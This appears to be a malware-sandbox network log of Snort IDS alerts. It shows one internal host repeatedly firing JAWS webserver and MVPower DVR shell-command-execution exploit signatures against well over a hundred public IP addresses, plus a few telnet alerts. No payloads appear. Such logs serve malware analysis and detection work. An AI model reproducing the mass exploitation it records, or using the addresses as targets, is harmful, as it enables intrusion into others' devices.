Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48456 -> 104.91.243.76:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33794 -> 34.72.161.123:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54970 -> 54.215.32.141:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48456 -> 104.91.243.76:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.91.243.76:80 -> 192.168.2.23:48456
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35484 -> 154.208.84.198:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33794 -> 34.72.161.123:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54970 -> 54.215.32.141:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35484 -> 154.208.84.198:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33316 -> 198.137.227.117:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49828 -> 206.237.203.53:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49906 -> 71.78.222.122:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36530 -> 93.124.7.241:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52904 -> 164.125.102.23:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51864 -> 13.127.48.126:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60572 -> 18.206.144.76:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36530 -> 93.124.7.241:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33316 -> 198.137.227.117:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53886 -> 163.197.10.78:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49828 -> 206.237.203.53:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49906 -> 71.78.222.122:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51864 -> 13.127.48.126:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44640 -> 154.83.130.140:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60572 -> 18.206.144.76:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53886 -> 163.197.10.78:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44640 -> 154.83.130.140:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36854 -> 148.251.213.163:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40264 -> 104.127.186.153:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40264 -> 104.127.186.153:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.127.186.153:80 -> 192.168.2.23:40264
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36854 -> 148.251.213.163:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36030 -> 2.20.110.236:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36030 -> 2.20.110.236:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 2.20.110.236:80 -> 192.168.2.23:36030
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56048 -> 23.4.45.116:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59824 -> 129.65.64.21:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51124 -> 14.47.155.220:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47938 -> 121.182.131.131:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56048 -> 23.4.45.116:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.4.45.116:80 -> 192.168.2.23:56048
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42242 -> 192.126.191.244:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54228 -> 192.177.86.65:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42242 -> 192.126.191.244:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 192.126.191.244:80 -> 192.168.2.23:42242
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47938 -> 121.182.131.131:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54228 -> 192.177.86.65:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48690 -> 163.198.23.5:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48690 -> 163.198.23.5:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 163.198.23.5:80 -> 192.168.2.23:48690
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49630 -> 104.73.145.187:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33560 -> 145.239.179.74:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49630 -> 104.73.145.187:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.73.145.187:80 -> 192.168.2.23:49630
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54812 -> 104.110.245.235:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43764 -> 188.215.245.201:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54812 -> 104.110.245.235:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.110.245.235:80 -> 192.168.2.23:54812
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43764 -> 188.215.245.201:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39412 -> 84.33.4.193:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54362 -> 23.43.198.42:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39412 -> 84.33.4.193:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58252 -> 74.114.236.42:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54362 -> 23.43.198.42:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.43.198.42:80 -> 192.168.2.23:54362
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42816 -> 208.73.161.59:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40864 -> 45.42.140.15:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58252 -> 74.114.236.42:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53672 -> 92.123.168.89:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58270 -> 110.77.231.242:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55646 -> 40.121.67.55:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40864 -> 45.42.140.15:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42816 -> 208.73.161.59:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55646 -> 40.121.67.55:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53672 -> 92.123.168.89:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 92.123.168.89:80 -> 192.168.2.23:53672
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58270 -> 110.77.231.242:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40370 -> 116.223.158.191:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40370 -> 116.223.158.191:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 116.223.158.191:80 -> 192.168.2.23:40370
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56276 -> 82.145.53.210:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55498 -> 104.66.118.40:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56276 -> 82.145.53.210:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55498 -> 104.66.118.40:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.66.118.40:80 -> 192.168.2.23:55498
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58738 -> 103.23.150.77:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60958 -> 65.23.95.68:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52378 -> 154.7.26.220:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47850 -> 154.210.227.149:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60958 -> 65.23.95.68:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54836 -> 210.157.8.21:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52378 -> 154.7.26.220:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47850 -> 154.210.227.149:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54836 -> 210.157.8.21:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37586 -> 107.149.36.175:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50136 -> 13.35.34.72:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50138 -> 13.35.34.72:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37586 -> 107.149.36.175:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50136 -> 13.35.34.72:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50138 -> 13.35.34.72:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52148 -> 52.8.118.109:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55398 -> 87.241.131.132:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54648 -> 104.25.186.110:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56218 -> 163.191.144.148:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54648 -> 104.25.186.110:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52148 -> 52.8.118.109:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55398 -> 87.241.131.132:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:32990 -> 23.8.136.124:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:32990 -> 23.8.136.124:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.8.136.124:80 -> 192.168.2.23:32990
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34616 -> 104.18.204.189:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34616 -> 104.18.204.189:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37852 -> 79.122.29.49:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37852 -> 79.122.29.49:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52880 -> 23.1.50.162:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52880 -> 23.1.50.162:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.1.50.162:80 -> 192.168.2.23:52880
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50822 -> 140.238.17.187:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37726 -> 23.219.254.140:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37726 -> 23.219.254.140:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.219.254.140:80 -> 192.168.2.23:37726
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52334 -> 107.179.98.103:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50822 -> 140.238.17.187:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52334 -> 107.179.98.103:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33038 -> 23.8.136.124:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33038 -> 23.8.136.124:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.8.136.124:80 -> 192.168.2.23:33038
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51310 -> 132.145.83.236:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51310 -> 132.145.83.236:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59810 -> 23.233.60.112:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39012 -> 37.251.249.22:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49550 -> 138.94.157.171:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55788 -> 113.61.196.114:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59810 -> 23.233.60.112:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33142 -> 23.8.136.124:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56674 -> 23.231.96.186:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55788 -> 113.61.196.114:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49550 -> 138.94.157.171:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53428 -> 122.10.14.220:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56674 -> 23.231.96.186:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33142 -> 23.8.136.124:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.8.136.124:80 -> 192.168.2.23:33142
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53428 -> 122.10.14.220:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45504 -> 130.211.8.33:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45504 -> 130.211.8.33:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57496 -> 64.4.161.77:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57496 -> 64.4.161.77:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54624 -> 45.121.81.233:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45786 -> 18.194.219.160:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54066 -> 23.72.103.103:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45786 -> 18.194.219.160:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39152 -> 18.193.172.193:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60838 -> 94.130.38.180:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54066 -> 23.72.103.103:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.72.103.103:80 -> 192.168.2.23:54066
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39152 -> 18.193.172.193:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60838 -> 94.130.38.180:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47884 -> 212.162.153.57:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44738 -> 23.65.25.211:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46632 -> 103.53.72.59:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47884 -> 212.162.153.57:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44738 -> 23.65.25.211:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.65.25.211:80 -> 192.168.2.23:44738
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46632 -> 103.53.72.59:80
Source: Traffic	Snort IDS: 716 INFO TELNET access 190.166.205.82:23 -> 192.168.2.23:47448
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33360 -> 23.8.136.124:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33360 -> 23.8.136.124:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.8.136.124:80 -> 192.168.2.23:33360
Source: Traffic	Snort IDS: 716 INFO TELNET access 195.162.70.50:23 -> 192.168.2.23:50284
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49150 -> 63.35.106.33:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55334 -> 159.69.185.199:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56866 -> 46.41.57.63:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49150 -> 63.35.106.33:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55334 -> 159.69.185.199:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56866 -> 46.41.57.63:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33030 -> 45.79.11.93:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35318 -> 107.174.250.137:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49626 -> 23.222.205.199:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57894 -> 23.211.83.100:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58204 -> 54.91.171.119:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33030 -> 45.79.11.93:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35318 -> 107.174.250.137:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49626 -> 23.222.205.199:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.222.205.199:80 -> 192.168.2.23:49626
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52570 -> 104.71.231.31:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57894 -> 23.211.83.100:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.211.83.100:80 -> 192.168.2.23:57894
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58204 -> 54.91.171.119:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54488 -> 147.47.78.53:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54360 -> 184.84.124.175:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52570 -> 104.71.231.31:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.71.231.31:80 -> 192.168.2.23:52570
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51624 -> 17.250.122.106:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52902 -> 59.124.138.19:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38762 -> 175.183.94.16:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54488 -> 147.47.78.53:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54360 -> 184.84.124.175:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.84.124.175:80 -> 192.168.2.23:54360
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52902 -> 59.124.138.19:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51624 -> 17.250.122.106:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38762 -> 175.183.94.16:80
Source: Traffic	Snort IDS: 716 INFO TELNET access 190.166.205.82:23 -> 192.168.2.23:47506
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57218 -> 31.19.184.171:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60228 -> 103.195.102.61:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56110 -> 104.64.130.77:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47650 -> 163.198.43.32:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47052 -> 184.168.137.54:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58648 -> 87.229.82.196:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47650 -> 163.198.43.32:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 163.198.43.32:80 -> 192.168.2.23:47650
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58648 -> 87.229.82.196:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34342 -> 134.121.170.228:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47008 -> 43.255.108.94:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34152 -> 192.99.143.98:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60228 -> 103.195.102.61:80
